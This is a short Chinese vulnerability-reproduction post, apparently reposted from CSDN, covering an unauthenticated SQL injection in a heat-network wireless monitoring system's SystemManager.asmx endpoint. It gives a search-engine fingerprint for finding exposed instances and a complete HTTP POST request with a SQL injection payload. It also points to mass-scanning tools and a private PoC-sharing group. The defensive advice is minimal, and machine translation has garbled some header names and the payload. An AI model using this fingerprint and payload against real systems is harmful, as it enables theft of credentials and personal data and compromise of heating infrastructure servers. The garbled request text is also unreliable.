【漏洞复现】热网无线监测系统 SystemManager.asmx SQL注入漏洞

【漏洞复现】热网无线监测系统 SystemManager.asmx SQL注入漏洞0x01 产品简介
热网无线监测系统是一种先进的热力管网监测解决方案,它通过无线通信技术实现对热力管网各项参数的实时监测和数据分析&#xff0

0x01 产品简介

热网无线监控系统采用无线通信技术,实现对热力管网各种参数的实时监控和数据分析,提高供热效率,降低能耗,保护管道,是先进的热力管网监控解决方案。网络安全。系统采用先进的传感器技术和无线通信技术,对热力管网内的温度、压力、流量等关键参数进行实时监测,并将数据发送至监测中心进行集中处理和分析。该系统快速检测管网异常,支持供热管理决策,提供供热系统智能、精细的管理。

0x02 漏洞概述

HotNet无线监控系统的SystemManager.asmx接口中存在一个SQL注入漏洞,可能允许未经身份验证的远程攻击者窃取数据库中的信息(包括管理员后端密码、站点用户的个人信息等)。即使拥有高权限,也可以向服务器写入木马,从而获得服务器系统的进一步权限。

0x03 搜索引擎

body=\’下载/HDPrintInstall.rar\’ || body=\’skins/login/images/btn_login.jpg\’

0x04 漏洞复现

POST /DataSrvs/SystemManager.asmx/UpdateWUT HTTP/1.1

Host:你的IP

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/108.0.5359.125 Safari/537.36

Accept-Encoding: gzip、deflate

接受: */*

接受语言: en-US;q=0.9,en;q=0.8

Content-Type: 应用程序/x-www-form-urlencoded

关闭连接:

id=%28SELECT+CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28CASE+WHEN+%281675%3D1675%29+THEN+@@版本+ELSE+CHAR%2848%29+END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28113%29%29name=desc=

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

使用VX扫描并加入我们内部的POC脚本共享圈。

0x06 修复建议

关闭互联网暴露或访问界面设置

升级到安全版本

#【漏洞复现】以上关于热网无线监控系统SystemManager.asmx SQL注入漏洞的相关内容仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93236.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月5日 下午8:54
下一篇 2024年7月5日 下午9:09

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注